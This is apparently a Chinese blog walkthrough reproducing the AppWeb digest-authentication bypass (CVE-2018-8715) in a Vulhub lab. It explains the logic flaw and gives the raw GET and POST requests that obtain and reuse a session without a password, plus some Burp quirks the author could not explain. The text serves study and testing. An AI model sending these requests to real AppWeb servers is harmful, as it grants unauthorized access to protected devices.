利用Vulnhub复现漏洞 - AppWeb认证绕过漏洞（CVE-2018-8715）

Vulnhub官方复现教程

https://vulhub.org/#/environments/appweb/CVE-2018-8715/

漏洞原理

AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写，能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。

AppWeb可以进行认证配置，其认证方式包括以下三种：

• basic 传统HTTP基础认证
• digest 改进版HTTP基础认证，认证成功后将使用Cookie来保存状态，而不用再传递Authorization头
• form 表单认证

其7.0.3之前的版本中，对于digest和form两种认证方式，如果用户传入的密码为null（也就是没有传递密码参数），appweb将因为一个逻辑错误导致直接认证成功，并返回session。

参考链接：

• https://ssd-disclosure.com/index.php/archives/3676
• https://github.com/embedthis/appweb/issues/610

漏洞环境

启动环境

https://blog.csdn.net/JiangBuLiu/article/details/93853056

浏览器

FireFox（浏览器）-选项-网络设置-链接设置-手动代理设置
HTTP:127.0.0.1；端口号：8080

BurpSuite

Burp-Proxy-Option
HTTP:127.0.0.1；端口号：8080

访问http://your-ip:8080，浏览器弹出窗口，需要输入账号密码。
【注意】本文中所有的your-ip请改为自己的IP地址

漏洞复现

利用该漏洞需要知道一个已存在的用户名，当前环境下用户名为joshua。
构造头Authorization: Digest username=joshua，并发送如下数据包：

GET / HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Digest username=joshua0

因为我们没有传入密码字段，所以服务端出现错误，直接返回了200，且包含一个session：
Set-Cookie: -http-session-=2::http.session::c20ab9809ca2b4168bba60515005bc3a; path=/;
2::http.session::c20ab9809ca2b4168bba60515005bc3a

【注意】Burp不知名原因，会消失最后一个字节

显示情况
发送的GET请求，用户名为123456

不知名原因，仅显示012345

建议复现的时候确认一下HeadersTab下的是否正确传参

利用session

1.设置这个session到浏览器，即可正常访问需要认证的页面：
[外链图片转存失败(img-gdRYIQ5a-1562319402072)(https://vulhub.org/vulhub/appweb/CVE-2018-8715/2.png)]
这个↑我也不知道在哪里设置- -

2.通过POST包发送session
通过抓包软件拦截，发送POST请求，添加session到HTTP 头信息和用户名后，发送数据包。

POST / HTTP/1.1
Host: your-ip:8080
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
-http-session: -2::http.session::c20ab9809ca2b4168bba60515005bc3a
Authorization: Digest username=joshua0

username=joshua

还是建议注意确认一下Headers